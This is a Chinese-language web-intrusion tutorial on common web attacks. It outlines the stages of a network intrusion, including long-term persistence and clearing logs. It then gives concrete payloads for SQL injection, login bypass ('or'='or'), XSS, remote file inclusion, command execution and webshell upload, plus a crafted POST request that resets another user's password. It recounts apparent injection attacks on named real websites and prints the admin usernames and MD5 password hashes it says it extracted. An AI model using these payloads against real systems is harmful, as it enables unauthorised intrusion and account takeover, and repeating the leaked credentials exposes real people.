入侵思路-攻击篇-常见WEB攻击
- 格式:doc
- 大小:852.50 KB
- 文档页数:24
第一部分常见WEB攻击一.按传统攻击分类,大概有以下几阶段1.漏洞探察,端口探测2.攻击外部入口3.架设连接内部网络的程序4.攻击内部网络5.攻击内部主机或网络,建立外连通道6.扩大内部网络攻击渗透的范围,下载传输内部网络的资料7.固定内部网络的战果,建立长期入侵通道8.清理入口,内部网络留下的工作日志9.尽量是内部网络和外部入口设备和机器保持网络管理员看起来的正常,减少网络传输的频率,保证能长期占领该网络二.下面就直接讲入侵的传统手法1.常见的就是扫描该网络的出口,找到映射出来的端口2.弱口令猜解,溢出,WEB渗透的办法,另外还有一些网络欺骗的手段,最后就是社会工程的方法搞定外部入口3.现在网络基本上的外部入口不会有特别的端口,常见协议有FTP,SSH,POP3,SMTP,WEB,telnetd,还有某些协议代理的端口,所以基本可用的方法首先就是溢出,大家可以去看看0DAY,实在没有就去找找发布过的1DAY,但是一般的没有太大的成功几率.我这里谈的攻击,主要谈谈通过WEB的渗透办法三.传统的WEB漏洞3.1. 目录浏览通过浏览地址http://IP/docquery,可以查看到docquery目录下的所有文件的名称3.2. 备份页面暴源码管理员为了维护的方便,会在web页面的目录保存页面编辑时候的备份文件,或者是由于某些编辑软件自动生成bak为扩展名的页面文件,导致在浏览器直接可以查看页面文件源代码3.3. 默认管理页面漏洞比如安装的是tomcat,存在默认管理页面http://IP/admin/index.jsp,并且没有更改默认的登陆帐号的密码,使用默认的账号密码可以登录。
通过上传木马可以轻易就获得WEBSHELL,由于tomcat以服务运行,因此直接获得system权限3.4 SQL 注入比如,http://IP/Page.jsp?City=天津该链接存在注入漏洞,参数city附近语法不严格导致产生注入点,可以使用数据库猜解工具得到数据库中的数据。
比如, 漏洞测试网站一:云南黑客联盟申请一个用户,登陆,然后发表文章,D:YNHACKUSER../inc/cls_main.asp网站路径管理员数小于5,管理3,第一个管理员用户名长度小于7,第一个管理员用户名长度为5用户名第一个字母为a,第一个管理员用户名为 admin,MD5密码第一个是7,后面的我就不猜了,和猜用户名同一个道理,不过,这里长度有16位。
手工很慢,为此,使用UNION查寻来提高效率,第一个管理员用户名 admin md5密码 7a57a5a743894a0e->admin.现在网速太慢。
被锁定了,这是第二个管理员liucho0400 密码b086f71d080453fa,第三个灵男密码581abc28e23d1669,后面的工作我就不作了,如果拿到解密后的密码进入后台轻易得到WEBSHELL漏洞测试网站二:新云官方网站不能注册,社会工程学来 admin admin 不行 123 123 不行,123456 123456 成功进入,发表文章进行了错误处理,提交 --,正常,说明是sql版,直接加用户,我们在nc_user中加一个用户名和密码都为 123的用户,先MDB转化一下,123->ac59075b964b0715,提交insert into nc_user(username,password) values('123','ac59075b964b0715'),现在登陆试试,可能数据库中有这个用户了吧,那我们它密码update nc_user set password='ac59075b964b0715' where username='123',成功。
现在利用辅助工具注入,前提是要登陆,不好意思,要用123456登陆才能看自己的文章好,现在已成功注入了。
至于拿WEBSHELL的事,我就不去搞了。
大家自己发挥吧3.5 登陆验证不严当尝试输入登陆为:1’or 1=1--时提示密码错误,说明程序已经接受了不合格登陆输入conetmibver1.0漏洞直接进入后台关键字:co net mib ver 1.0 design by hypo安全漏洞利用方法:后台管理界面:/manage/Login.asp然后利用漏洞 'or'='or'登录。
3.6 跨站构建链接http://IP/IDC.jsp?Sex=男&Sex=女&strArea=0”><script>alert(“Hello, MatriXay!”)</script>,界面弹出JA V ASCRIPT对话框“HELLO,MATRIXAY!”。
3.7任意文件被下载https://ip/download.jsp?downpath=down.jsp只要知道文件路径,可以下载系统中的任意文件。
3.8 暴露绝对路径提交特殊参数,导致页面出错,暴露页面文件的绝对路径命令解释行的脚本命令http://IP/cmd.pl?dir+c:\服务器存在类似的脚本解释程序,可以执行服务器上的命令3.10 存在upload.asp等类似文件上传文件的利用可以使用桂林老兵等上传程序突破文件名限制上传WEBSHELL 木马,或者用nc.exe上传也可以3.11 .php脚本远程文件包含漏洞.php脚本没有正确地验证某些变量的数据,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
/wp-includes/functions.php?file=http: ///shell.txt?session欺骗漏洞比如, 拥原创文学整站程序:(1).注入漏洞:list.asp对articleID变量没做过滤导致注入漏洞,还有dispac.asp文件对id变量没做过滤,但是这个文件要管理员登陆后才能注入,所以有点像鸡漏洞。
(2)session欺骗漏洞:和上面的方法一样,写一个asp文件session("idu")="black-you"进后台看看吧!!3.13 cookies注入比如, 雷霆购物系统:我们先来看看reseach.asp才是真正的搜索文件,其中又这样一段代码:ifname<>""thensql=sql&"andnamelike'%"&name&"%'"endififauthor<>""thensql=sql&"andauthorlike'%"&author&"%'"endififmanufacturer<>""thensql=sql&"andmarklike'%"&manufacturer&"%'"endififcode<>""then这就是经典的填字游戏!!因为它在高级搜索页面作了javascript过滤,所以我们要用nc提交来进行cookies注入。
但我们也可以在快速搜索页面提交:“504%’注入语句’%504”就能注入了,抓包然后把地址放在NBSI里就能注入了,因为我的IIS有点问题,所有就没深入测试。
3.14 cookies欺骗漏洞Forget.asp是密码找回文件文件,repws.asp是修改密码文件,我们来看看它的部分代码:<%ifrequest("username")=""thencallMsgBox("非法使用!","Back","None")response.endendifdimtmpsetrs=server.CreateObject("adodb.recordset")'提交修改密码ifnotisempty(request("SubmitRePws"))thenifrequest("password")<>request("password2")thencallMsgBox("再次输入密码不一致!","Back","None")rs.open"selectpasswordfrom[user]whereusername='"&trim(requers("password")=md5(trim(request("password2")))rs.updaters.closecallMsgBox("您的密码取回成功,请登录!","GoUrl","login.asp") response.endendifrs.open"selectanswerfrom[user]whereusername='"&trim(request ("username"))&"'",conn,1,1tmp=trim(rs("answer"))rs.closeiftmp<>md5(request("answer"))thencallMsgbox("对不起,您输入的问题答案不正确","Back","None") response.endendifsetrs=nothing%>呵呵,笑了吧!我们现在来构造数据包:POST/lt/repws.aspHTTP/1.1Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,app lication/x-shockwave-flash,application/vnd.ms-excel,applica tion/vnd.ms-powerpoint,application/msword,*/*http://localhost/lt/repws.aspAccept-Language:zh-cnContent-Type:application/x-www-form-urlencodedAccept-Encoding:gzip,deflateUser-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1; Maxthon)Host:localhostContent-Length:72Connection:Keep-AliveCache-Control:no-cacheCookie:ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF password=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&u sername=x-key修改就把ueername和password、possword2还有Content-Length修改一下就行了,其他的都不用改。